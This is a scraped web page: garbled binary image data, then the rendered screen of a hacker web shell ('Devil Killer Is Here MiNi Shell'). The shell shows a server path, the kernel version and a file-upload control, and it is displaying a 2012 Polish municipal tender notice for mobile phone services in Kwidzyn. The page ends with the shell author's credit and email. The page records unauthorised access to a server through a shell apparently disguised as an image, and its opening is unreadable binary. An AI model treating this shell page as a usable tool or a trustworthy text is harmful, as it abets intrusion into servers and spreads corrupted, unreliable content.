JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120718/258068-N-2012.html

<p class="kh_header"><b>Kwidzyn: Świadczenie usług telekomunikacyjnych z zakresu telefonii komórkowej dla Urzędu Miejskiego w Kwidzynie</b><br>
<b>Numer ogłoszenia: 258068 - 2012; data zamieszczenia: 18.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Kwidzyn , ul. Warszawska 19, 82-500 Kwidzyn, woj. pomorskie, tel. 055 6464700, 6464777, faks 055 6464703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kwidzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług telekomunikacyjnych z zakresu telefonii komórkowej dla Urzędu Miejskiego w Kwidzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług telekomunikacyjnych w zakresie telefonii komórkowej dla Urzędu Miejskiego w Kwidzynie, na terenie całego kraju jak również na terenie UE i poza nią, przez okres 24 miesięcy.
W ramach świadczenia usług telekomunikacyjnych Wykonawca musi zapewnić zachowanie aktualnych 26 numerów telefonów bez względu na to, w jakiej sieci do tej pory poszczególne numery funkcjonowały; ewentualny koszt przeniesienia numerów i opłaty aktywacyjnej za przyłączenie do sieci  zostanie poniesiony przez Wykonawcę, lub zostanie przez Wykonawcę zrefundowany Zamawiającemu w formie pieniężnej lub w formie dodatkowego pakietu kwotowego przeznaczonego na rozmowy.
Wykonawca zobowiązany jest, po uzyskaniu upoważnienia Zamawiającego, do ewentualnego wypowiedzenia aktualnych umów dla poszczególnych numerów telefonów, złożenia wniosków o przeniesienie numerów telefonów i aktywacji nowych kart SIM.

Zamawiający oczekuje obniżania cen, w przypadku zmian regulaminu świadczenia usług telekomunikacyjnych, dotyczących zmiany cen, jeśli będą korzystne dla Zamawiającego, bez ponoszenia z tego tytułu dodatkowych kosztów oraz pełnego serwisu informacyjnego dotyczącego możliwości dodatkowego obniżania kosztów połączeń i transmisji danych w ramach niniejszej umowy,

Zamawiający dysponuje 3 grupami kart SIM:
Grupa I - karta SIM służące do połączeń głosowych w telefonach indywidualnych
Grupa II - karty SIM zainstalowane w bramce GSM
Grupa III - karta SIM do transmisji danych (połączenie z Internetem)

Wykaz aktualnych numerów telefonów funkcjonujących w urzędzie:

lp.	Nr telefonu	Grupa
1.	601642010	I
2.	601642011	I
3.	601698155	I
4.	601710910	I
5.	601847322	I
6.	603746440	I
7.	603746441	I
8.	605214511	I
9.	606988365	I
10.	607293122	I
11.	693089555	I
12.	693951100	I
13.	693951200	I
14.	695825400	I
15.	695825600	I
16.	695825800	I
17.	603746442	I
18.	601639248	I
19.	604181024	I
20.	604469899	I
21.	606133879	I
22.	723005101	I
23.	723005102	I
24.	695245200	I
25.	605322422	I
26.	695904700	II
27.	609327300	III

Zamawiający wymaga dla kart SIM z Grupy I:
1.	niezmiennej stawki za połączenia i sms bez względu na liczbę połączeń i smsów w okresie rozrachunkowym,
2.	darmowych połączeń pomiędzy własnymi numerami kart SIM (grupa biznesowa),
3.	możliwości aktywacji pakietu transmisji danych ( min 1,5 GB) dla każdej z kart SIM,
4.	aby po przekroczeniu limitu pakiety danych nie były naliczane żadne dodatkowe koszty; możliwe jest obniżenie prędkości transmisji danych do końca bieżącego okresu rozliczeniowego, jednak nie mniej, aniżeli 56 kBs,
5.	aby abonament powiększony o koszt usług dodatkowych, o ile przekroczy wartość 2 zł netto, podlegał wykorzystaniu na połączenia głosowe lub SMSy wg stawek za połączenia w ofercie Wykonawcy,
6.	aby łączny koszt abonamentu, usług dodatkowych i pakietu transmisji danych nie przekroczył kwoty 50 zł netto,
7.	naliczenia sekundowe w połączeniach od 1 s połączenia,
8.	brak opłaty za inicjację połączenia,
9.	aby krajowe połączenia głosowe do wszystkich sieci komórkowych odbywały się w jednakowej cenie,
10.	aby krajowe połączenia głosowe do wszystkich sieci stacjonarnych odbywały się w jednakowej cenie,
11.	aby krajowy przesył SMS do wszystkich sieci odbywał się w jednakowej cenie,
12.	bezpłatnego korzystania i odsłuchiwania poczty głosowej,
13.	aktywacji usługi roamingu, 
14.	identyfikacja numeru dzwoniącego, 
15.	bezpłatnej usługi zarządzania abonamentami i usługami dodatkowymi ze strony internetowej przez wskazanych pracowników zamawiającego,

Zamawiający wymaga dla karty SIM z Grupy II:
dostarczenia oraz zainstalowania karty SIM do bramki GSM 501303E 2N Easy Gate ver GSM 01.201 (GSM BAND: 850/900/1800/1900 MHz) która to współpracuje z centralą Alcatel omniPCX Office 100. Karta SIM do bramki GSM zainstalowana będzie w centrali telefonicznej, która jest w siedzibie Zamawiającego. Usługi telefonii stacjonarnej dla Zamawiającego świadczone są aktualnie przez operatora: Telefonia DIALOG S.A.

Zamawiający wymaga dla kart SIM z Grupy III:
1.	aktywacji i realizacji usługi transmisji danych w pakiecie min 20 GB, o maksymalnej prędkości min. 7,2 MBs,
2.	aby po przekroczeniu limitu pakiety danych nie były naliczane żadne dodatkowe koszty; możliwe jest obniżenie prędkości transmisji danych do końca bieżącego okresu rozliczeniowego, jednak nie mniej, aniżeli 56 kBs,

Warunki rozliczenia:
1.	okresem rozliczeniowym będzie okres nie dłuższy niż 1 miesiąc, 
2.	bezpłatne bilingi do poszczególnych numerów dostarczane będą wraz z fakturą w terminie do 10 dni kalendarzowych od dnia zakończenia okresu rozliczeniowego,
3.	faktura zbiorcza w cyklu miesięcznym dostarczana będzie dla każdej z grup kart SIM; Zamawiający dopuszcza możliwość wystawienia jednej faktury dla 2 lub 3 grup kart SIM,
4.	płatność nastąpi przelewem w terminie od 14 do 30 dni od otrzymania faktury VAT,
5.	Termin wykonania zamówienia to 24 miesiące od dnia podpisania umowy powiększone o okres niezbędny na ewentualne wypowiedzenie aktualnie obowiązujących umów. 

W okresie realizacji zamówienia Zamawiający zastrzega sobie możliwość dokonania aktywacji nowych numerów telefonicznych (kart SIM) oraz dołączenia (przeniesienia) dodatkowych, istniejących numerów (kart SIM) do grupy biznesowej (niezależnie od tego, kto był-jest aktualnym użytkownikiem (numeru (karty SIM)) na zasadach określonych w niniejszej SIWZ oraz przedłożonej ofercie.
Dla ewentualnych następnych aktywowanych oraz dołączonych (przeniesionych) numerów telefonicznych (kart SIM) Wykonawca zobowiązany będzie świadczyć usługi na zasadach określonych w ofercie.
Wszystkie rodzaju usług niewymienionych w formularzu ofertowym a dostępnych w ofercie biznesowej Wykonawcy, muszą być rozliczane wg zasad i cen wynikających z najdroższego biznesowego planu taryfowego Wykonawcy, dołączonego do oferty Wykonawcy.
W przypadku zmiany planów taryfowych Wykonawcy obowiązywać będzie aktualna biznesowa oferta Wykonawcy.
Wykonawca w treści oferty zobowiązany jest przedstawić pełen wykaz modeli telefonów wraz z podaniem cen, dostępnych w ramach oferty przedstawionej Zamawiającemu. Zamawiający zastrzega sobie prawo do swobodnego wyboru telefonów wg cen podanych w ofercie.
W okresie 10.06.2012 - 04.07.2012 z telefonów Zamawiającego wykonano następujące wielkości połączeń (minuty):

Orange	P4	Polkomtel	PTC	stacjonarne
1376	741	2151	984	357
Wysłano również 603 wiadomości SMS..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 64.21.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żada wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie aktualnego zaświadczenia o wpisie do rejestru przedsiębiorców telekomunikacyjnych, prowadzony przez Prezesa Urzędu Komunikacji Elektronicznej zgodnie z ustawą z dnia 16 lipca 2004 r.- Prawo Telekomunikacyjne (Dz. U. z 2004 r. Nr 171, poz. 1800 z późń. zm.);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kwidzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kwidzynie
ul. Warszawska 19, 82-500 Kwidzyn
pokój 312 (II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2012 godzina 09:00, miejsce: Urząd Miejski w Kwidzynie
ul. Warszawska 19, 82-500 Kwidzyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com